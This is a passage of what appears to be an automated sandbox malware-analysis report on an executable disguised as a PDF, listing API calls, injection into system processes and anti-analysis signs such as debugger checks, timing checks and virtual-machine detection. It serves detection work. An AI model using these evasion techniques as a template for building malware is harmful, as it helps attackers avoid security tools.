                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_038D283D push eax; iretd 3_2_038D2858
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_02F824A1 push ss; iretd 3_2_02F824A2
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_02F84A70 pushfd ; ret 3_2_02F84BCD
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_02F84B73 pushfd ; ret 3_2_02F84BCD
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_02F7E898 push ss; retf 3_2_02F7E999
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_02F7E98B push ss; retf 3_2_02F7E999
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00AE4A35
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B655FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00B655FD
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B033C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B033C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\recover.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | API/Special instruction interceptor: Address: 1C531F4
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\recover.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\recover.exe | Window / User API: threadDelayed 3023
                Source: C:\Windows\SysWOW64\recover.exe | Window / User API: threadDelayed 6949
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-99152
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | API coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\recover.exe | API coverage: 2.9 %
                Source: C:\Windows\SysWOW64\recover.exe | TID: 1196 | Thread sleep count: 3023 > 30
                Source: C:\Windows\SysWOW64\recover.exe | TID: 1196 | Thread sleep time: -6046000s >= -30000s
                Source: C:\Windows\SysWOW64\recover.exe | TID: 1196 | Thread sleep count: 6949 > 30
                Source: C:\Windows\SysWOW64\recover.exe | TID: 1196 | Thread sleep time: -13898000s >= -30000s
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | TID: 5304 | Thread sleep time: -105000s >= -30000s
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | TID: 5304 | Thread sleep time: -43500s >= -30000s
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B44696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00B44696
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00B4C9C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4C93C FindFirstFileW,FindClose, 0_2_00B4C93C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00B4F200
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00B4F35D
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00B4F65E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B43A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00B43A2B
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B43D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00B43D4E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B4BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00B4BF27
                Source: C:\Windows\SysWOW64\recover.exe | Code function: 3_2_02F8C5C0 FindFirstFileW,FindNextFileW,FindClose, 3_2_02F8C5C0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00AE4AFE
                Source: recover.exe, 00000003.00000002.4207941820.000000000835E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWu
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4204619311.0000000000920000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
                Source: recover.exe, 00000003.00000002.4207941820.000000000835E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: SC_TR11670000_pdf.exe, 00000000.00000003.1751687828.00000000010D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe
                Source: firefox.exe, 00000008.00000002.2221360071.0000028BE4CCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | API call chain: ExitProcess graph end node graph_0-98508
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | API call chain: ExitProcess graph end node graph_0-98079
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\recover.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417A33 LdrLoadDll, 1_2_00417A33
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B541FD BlockInput, 0_2_00B541FD
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00AE3B4C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B15CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00B15CCC
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B5C304 LoadLibraryA,GetProcAddress, 0_2_00B5C304
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_01C534C0 mov eax, dword ptr fs:[00000030h] 0_2_01C534C0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_01C53460 mov eax, dword ptr fs:[00000030h] 0_2_01C53460
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_01C51E70 mov eax, dword ptr fs:[00000030h] 0_2_01C51E70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D437C mov eax, dword ptr fs:[00000030h] 1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h] 1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h] 1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0370634F mov eax, dword ptr fs:[00000030h] 1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h] 1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h] 1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h] 1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h] 1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h] 1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036663FF mov eax, dword ptr fs:[00000030h] 1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h] 1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h] 1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h] 1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h] 1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h] 1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h] 1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h] 1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h] 1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h] 1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362826B mov eax, dword ptr fs:[00000030h] 1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h] 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h] 1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h] 1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0370625D mov eax, dword ptr fs:[00000030h] 1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h] 1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636259 mov eax, dword ptr fs:[00000030h] 1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h] 1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362823B mov eax, dword ptr fs:[00000030h] 1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h] 1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h] 1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h] 1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h] 1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
